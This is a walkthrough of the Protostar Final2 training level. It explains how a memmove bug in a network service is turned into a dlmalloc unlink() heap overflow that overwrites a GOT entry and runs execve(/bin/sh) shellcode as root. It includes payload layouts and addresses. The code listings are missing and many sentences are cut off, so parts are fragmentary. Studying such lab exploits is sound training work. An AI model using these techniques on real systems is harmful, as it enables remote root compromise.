This is an explanation of Protostar level Final2. I wrote a solution in April without an explanation. I read it last night and had to spend half a day to understand it again. So next time I’ll write the explanation while it’s still fresh in my head.
The level’s description is
Remote heap level :)
Core files will be in /tmp.
This level is at /opt/protostar/bin/final2
This is the source code.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78
Overview of source code
The first line of the description coupled with the fact the code listens on port 2993 means we’ll
have to send a TCP packet that exploits a heap related vulnerability.
main() is pretty simple. It
runs the final2 binary in the background as root and processes requests with
get_requests() declares an array of 256 char pointers and reads input strings into it. If any
request size isn’t
REQSZ or 128 bytes, the function breaks out of the
while(1) loop. Any request
payload that doesn’t start with
FSRD also breaks out of the loop. The
check_path() function is
then called and
dll is incremented. A for-loop writes “Process OK” to stdout and frees each string
buffer starting with the oldest.
check_path() stores a pointer to
l is the length of the string
p is greater than 0,
start points to the part of
buf that has
"ROOT" is a substring in
buf, the while loop decrements
start until it finds a
l bytes of the string starting at
A TCP packet with the string
FSRD/ROOT/AAAA will cause
p to point to the second
p as a
l is 5.
start initially points to the
ROOT and later is decremented
to point to the first
memmove() changes the string to
start-- doesn’t check the bounds of the string passed in by
buf. It will keep
scanning leftward until it finds some
memmove() can write to memory outside of the current
General Exploit Strategy
We know we’ll need to exploit the
free() call which in this series of exercises uses the
unlink() macro. In a previous post, I showed how this exploit
manipulates heap memory to redirect code execution. We’ll need to inject shellcode via the request
payloads. Our request payloads also need to corrupt heap memory in a way that will trick dlmalloc
into redirecting code to the shellcode.
Let’s craft a first payload that will allow the second payload to overwrite heap memory before the
start of the second string.
FSRDAAAA...AAAA/AAAA should work. The second payload can be
FSRDROOTAAA...AAAA/BBBB. After the second call to
check_path(), the heap memory of the first
string should be
FSRDAAAA...AAAA/BBBB. Let’s confirm this with a Python script and
set a breakpoint right after the call to
check_path() and send these two strings.
We save the following contents to a file named
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
I’m running the Protostar VM on Virtualbox on a Macbook. Set the network settings for the VM to
Host-only Adapter. Once the VM starts, use the Virtualbox “Show” button to get a terminal to the VM.
user with password
ip addr show to find the VM’s local IP address. Mine is
192.168.99.107. I then close the Virtualbox terminal because I like to use iTerm. I SSH with iTerm
into the VM as root with password
godmode. We need to be root in order to attach gdb to a running
You can see final2 is already running. We get the PID.
Now attach gdb to it. Since the program forks a new child process to handle requests, we
set follow-fork-mode child to make gdb follow the child process instead of the parent.
set detach-on-fork off makes gdb hold control of both parent and child (I’m not sure if this is necessary). The other two gdb settings are my personal preferences.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27
get_requests() to find where
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
Now run our Python script in another terminal to send the strings.
Our gdb terminal will show the following.
1 2 3 4 5 6 7 8
buf to show the address it points to. Then examine the first 40 DWORDs in hexadecimal
starting at address
0x804e008 - 0x8 so we can see the first heap chunk’s metadata in
the previous 8 bytes). We can see its
0x44525346) followed by lots of
1 2 3 4 5 6 7 8 9 10 11 12 13 14
We continue and examine the memory of the first chunk again. We expect the memory at address
0x804e084 to be
0x42424242 which it is.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
With the ability to overwrite bytes following a strategically placed
/ character in the previous
heap chunk, we can perform a classic heap overflow exploit using the
unlink() technique. We can’t
overwrite the first chunk’s heap metadata because there’s no way to insert a
/ before it. So we
target the second chunk’s heap metadata. I’m now going to rehash some of the dlmalloc algorithm
explained in my previous post because it can be a little confusing.
When the first chunk is freed,
unlink() will run on the second chunk if the second chunk has
already been freed. dlmalloc determines if the second chunk is freed by checking the third chunk’s
PREV_INUSE bit which is the lowest bit of the second byte of the chunk. In order to find the start
of the third chunk, dlmalloc adds the value of the chunk’s second DWORD bitmasked with 0x1 (i.e.
ignoring the lowest bit) to the chunk’s starting address. So in the above memory dump, the
start of the second chunk is
0x00000089 &0x1 + 0x804e000 = 0x804e088. Likewise, the start of the
third chunk is
0x00000089 &0x1 + 0x804e088 = 0x804e110. So we have to figure out a way to write
arbitrary bytes to the third chunk.
But we’re already writing arbitrary bytes to the second chunk’s metadata. Is there way to make
dlmalloc think the third chunk starts somewhere in memory where we’re already writing bytes for the
second chunk? Nothing in dlmalloc checks the third chunk is actually right after the second.
dlmalloc just blindly performs an addition on two numbers. One of these numbers is the second
chunk’s size which we can set via the
memmove() bug. Let’s make dlmalloc think the third chunk is
actually four bytes before the start of the second chunk. The second chunk is at
0x804e088 so the
“virtual” third chunk will be at
0x804e084. What number added to
-4. [Integer overflow] means adding
0xfffffffc is the same as adding -4 (
0x804e088 + 0xfffffffc =
0x804e084). So the second chunk’s second DWORD representing its size must be
0xfffffffc, and the
PREV_INUSE bit of the third chunk must be 0.
0xfffffffc 0xfffffffc will work.
Once we fool dlmalloc into thinking the second chunk is already freed, dlmalloc will
So we need to craft values for the second chunk’s forwards and backwards pointers such that
unlink() will redirect code execution to another region of memory where we can insert shellcode.
In the Heap3 level we overwrote the address of a function in the procedure linkage table (PLT) with
the address of shellcode. We can do the same here. Since we send two packets,
dll will be 2. The
for-loop will call
write() twice. The first
free() will overwrite
write()’s address in the
PLT. Let’s find the PLT address containing the address of
examine the address
0x8048dfc as an instruction to get the address in the global offset table
(GOT) that points to the dynamically linked library containing the actual
write()0 function. We
want to overwrite the contents of
0x804d41c with the address of our shellcode. Since
adds 12 to the forwards pointer, we need to make the forward pointer
0x804d41c - 12.
1 2 3 4 5 6 7 8 9 10 11 12 13
Crafting Malicious Packets
Where should we put our shellcode? We can include it in our first request. The first two DWORDs will
be clobbered by dlmalloc when it sets the first chunk’s forwards and backwards pointers. The first
word needs to be used for
FSRD anyways. So let’s put shellcode at
0x804e010. This address will
be our backwards pointer.
To summarize, this is how the packets should look so far.
The first payload must start with
FSRD. Then we need four bytes of filler bytes
AAAA followed by
shellcode (TBD). The last byte must be
memmove(). The payload must be 128 bytes. The
spaces in the payload visualization below are just for readability. They shouldn’t be in the actual
The second payload must start with
FSRDROOT. Then have
0xfffffffc 0xfffffffc. Then the forward
0x804d41c - 12 and backward pointer
0x804e010. The whole payload must again be 128
bytes. We can just fill with
Before we craft shellcode, let’s confirm the exploit will redirect code execution to the proposed
shellcode address. Instead of using actual shellcode, we’ll use four bytes of
0xcc which is a
one-byte x86 instruction called
INT3 that causes the processor to halt the process for any
attached debuggers. If we hit this opcode, our attached gdb debugger receive the
Let’s test with the below Python script.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33
Attach gdb to the
final2 process again.
1 2 3 4 5 6 7 8 9 10 11
Set a breakpoint at the call to
1 2 3 4
Run the Python script in another terminal. Hit enter to send a third packet that’s less than 128
bytes to break out of the
1 2 3
The gdb session should hit the breakpoint at
1 2 3 4 5 6 7 8
Examine the first 80 DWORDs. Continue and examine again.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48
0x804e00c have been changed (to addresses before the heap. I guess
because it’s some special value for the first chunk). Our INT3 instruction is at
look at the GOT entry for
1 2 3 4 5
Its value is the location of our INT3. This means the next call to
write() will redirect code
execution to our INT3 which should cause gdb to break again.
1 2 3 4 5
Crafting the Shellcode
So now all we have to is insert some real shellcode that’ll own the system. Since final2 is running
root, let’s make the process start a shell. This will allow us send arbitrary commands over TCP
that get executed as root, i.e. remote code execution. Shellstorm has a great library of
shellcodes. Let’s use “Linux/x86 - execve(/bin/sh) - 28 bytes”. But we have a
unlink() overwrites the memory at
0x804e018 (it’ll always overwrite four bytes of
memory eight bytes ahead of whatever address we pick), and no useful shellcode is short enough to
fit into eight bytes. What can we do?
If the shellcode could only jump past
0x804e01c where we have a huge piece of
contiguous memory. Luckily the
jmp instruction (
\xeb) does exactly this. Its argument is how many
bytes to jump over. So our shellcode can start with
0xeb 0x0a which moves the instruction pointer
10 bytes forward. We fill in the middle 10 bytes with
0x90). Our final script will
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40
1 2 3 4 5